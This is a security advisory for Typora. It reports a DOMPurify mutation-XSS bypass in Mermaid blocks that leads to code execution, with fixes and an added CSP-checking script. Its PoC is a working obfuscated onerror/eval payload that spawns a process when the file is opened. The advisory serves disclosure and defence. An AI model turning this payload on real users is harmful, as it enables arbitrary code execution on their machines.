Summary
An mXSS (mutation XSS) in Typora leads to remote code execution. The vector is Mermaid code blocks (HTML labels); however, other spots where Typora attempts to clean up HTML using DOMPurify could be prone to the same issue.
Steps to reproduce / PoC
Create an .md with the following contents:
```mermaid
graph TD
z --> q{<svg></p><style><g title=<svg>
"</style><img src onerror=eval(atob('dHJ5e3ZhciByPXJlcW5vZGUoJ2NoaWxkX3Byb2Nlc3MnKTtyLmV4ZWNGaWxlKCcvdXNyL2Jpbi9nbm9tZS1jYWxjdWxhdG9yJyl8fHIuZXhlY0ZpbGUoJ2NhbGMuZXhlJyl9Y2F0Y2h7d2luZG93LmJyaWRnZS5jYWxsSGFuZGxlcignd2luZG93Lm9wZW4nLCAnZmlsZTovLy9TeXN0ZW0vQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3InKX07'))>">}
```
The payload is simply HTML-entity-encoded
where the JS is simply:
Fix
It's perhaps best to upgrade DOMPurify to the latest version, which seems to address the newer mutation XSS vectors. The version shipped with Typora looks rather old (1.0.4).
Consider employing a Content Security Policy for a broader mitigation. RCE via XSS appears to be a recurring pattern among Typora's issues. Implementing a fine-tuned CSP is time consuming, but building a good policy step by step could prove worthwhile in the long run and cover users even when new XSS vectors are discovered.
Notes
Versions known to be vulnerable and tested are 0.9.81 and 0.9.9.31.2 (3946). These are the latest downloads from the website (for Linux and macOS respectively). I did not test the Windows version of the app.
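As an added illustration of the CSP mitigation proposed in the Fix section, the following is example code written for this page; it is not code from the Typora issue or from the Typora project. It is a small checker that parses a Content-Security-Policy header value and reports whether the policy still grants the two things the report's execution path relies on: an inline event-handler attribute (`onerror=`) and `eval`. The two sample policies are constructed for the example; the fallback chains it uses (`script-src-attr`, then `script-src`, then `default-src` for handler attributes; `script-src`, then `default-src` for `eval`) follow the CSP specification.

```javascript
// Added example (not code from the Typora issue or the Typora project): a small
// Content-Security-Policy checker that reports whether a policy still permits
// the two things the payload in this report relies on: an inline event-handler
// attribute (onerror=...) and eval(). The policies at the bottom are constructed samples.

// Parse a CSP header value into a Map of directive name -> array of source tokens.
function parseCsp(header) {
  const policy = new Map();
  for (const raw of header.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // CSP honours only the first occurrence of a duplicated directive.
    if (!policy.has(name)) policy.set(name, tokens.slice(1));
  }
  return policy;
}

// Return the source list that governs a script context, following CSP's fallback
// chain (e.g. script-src-attr -> script-src -> default-src). null = nothing applies.
function governing(policy, chain) {
  for (const name of chain) {
    if (policy.has(name)) return policy.get(name);
  }
  return null;
}

function hasNonceOrHash(sources) {
  return sources.some((s) => /^'(nonce-|sha(256|384|512)-)/i.test(s));
}

// Assess a policy string and return what it still allows for script execution.
function assessCsp(header) {
  const policy = parseCsp(header);
  const attrSources = governing(policy, ['script-src-attr', 'script-src', 'default-src']);
  const scriptSources = governing(policy, ['script-src', 'default-src']);

  // Inline event handlers (onerror=, onload=, ...) run only if the governing
  // directive is absent, or grants 'unsafe-inline' without any nonce/hash source
  // (a nonce or hash in the list makes 'unsafe-inline' ignored), or grants
  // 'unsafe-hashes' together with hashes (then only handlers whose hash is listed
  // run; reported as allowed here because an explicit grant for attributes exists).
  let allowsInlineHandlers;
  if (attrSources === null) {
    allowsInlineHandlers = true;
  } else {
    const lower = attrSources.map((s) => s.toLowerCase());
    allowsInlineHandlers =
      (lower.includes("'unsafe-inline'") && !hasNonceOrHash(lower)) ||
      (lower.includes("'unsafe-hashes'") && hasNonceOrHash(lower));
  }

  // eval(), Function() and string-argument timers are governed by script-src
  // (falling back to default-src) only; script-src-attr/-elem do not apply.
  const allowsEval =
    scriptSources === null ||
    scriptSources.map((s) => s.toLowerCase()).includes("'unsafe-eval'");

  return {
    hasScriptPolicy: scriptSources !== null,
    allowsInlineHandlers,
    allowsEval,
    // The report's execution path needs both an inline handler and eval,
    // so denying either one interrupts it.
    blocksReportPayloadPath: !allowsInlineHandlers || !allowsEval,
  };
}

// Constructed sample policies: a permissive policy many desktop web views start
// with, and a first hardening step that drops the two unsafe grants.
const PERMISSIVE_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'";
const HARDENED_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

for (const [label, csp] of [['permissive', PERMISSIVE_CSP], ['hardened', HARDENED_CSP]]) {
  console.log(label, assessCsp(csp));
}
```

Run under Node to see the assessment for both sample policies. A policy that grants neither `'unsafe-inline'` nor `'unsafe-eval'` for scripts blocks this report's execution path even though the sanitizer bypass still lands the mutated markup in the DOM; the CSP is a second layer on top of the DOMPurify upgrade, not a replacement for it, and the step-by-step approach the Fix section suggests is to start from a policy like the hardened sample and add specific sources only as the application demonstrably needs them.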
CVSS 8.3
My take is CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
// Mark Art at Havoc Research